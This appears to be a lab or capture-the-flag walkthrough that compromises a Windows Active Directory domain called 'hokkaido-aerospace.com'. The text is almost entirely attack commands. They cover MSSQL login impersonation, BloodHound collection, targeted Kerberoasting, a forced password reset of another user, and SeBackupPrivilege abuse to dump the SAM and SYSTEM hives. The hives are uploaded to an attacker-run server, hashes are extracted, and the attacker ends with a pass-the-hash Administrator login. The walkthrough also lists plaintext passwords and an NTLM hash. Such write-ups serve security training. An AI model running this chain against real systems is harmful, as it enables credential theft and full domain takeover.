Now trying mssql with discovery creds from [[445]]
Copy nxc mssql hokkaido-aerospace.com -u discovery -p 'Start123!'
Now we can login to mssql:
Copy mssqlclient.py discovery@hokkaido-aerospace.com -windows-auth
Now checking for impersonation:
Copy SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Copy EXECUTE AS LOGIN = 'hrappdb-reader' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin')
Now checking databases:
Copy SELECT name FROM master.dbo.sysdatabases
Copy SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
Copy select * from sysauth;
Now running bloodhound digestor:
Copy bloodhound.py -u 'hrapp-service' -p 'Untimed$Runny' -ns 192.168.218.40 -d hokkaido-aerospace.com -c all --zip
Copy targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
RERUN BLOODHOUND AS HAZEL:
Copy bloodhound.py -u 'Hazel.Green' -p 'haze1988' -ns 192.168.218.40 -d hokkaido-aerospace.com -c all --zip
We can see Molly has more rights.
Now resetting Molly's password:
Copy net rpc password "molly.smith" "Password123@" -U "hokkaido-aerospace.com"/"Hazel.Green"%"haze1988" -S "dc.hokkaido-aerospace.com"
Copy xfreerdp /u:molly.smith /p:'Password123@' /v:hokkaido-aerospace.com /cert-ignore /compression /auto-reconnect
Now we can use our SeBackupPrivilege to Privesc:
Copy cd c:\
reg save hklm\sam c:\Temp\sam\
reg save hklm\system c:\Temp\system
Now we have sam and system in Temp directory.
Now start a python upload server on kali:
Copy python3 -m uploadserver 80
Now upload sam ans system by visiting edge on windows target.
Now use secretsdump.py:
Copy secretsdump.py LOCAL -sam sam -system system
Now we can login with evil-winrm:
Copy evil-winrm -i hokkaido-aerospace.com -u Administrator -H 'd752482897d54e239376fddb2a2109e4'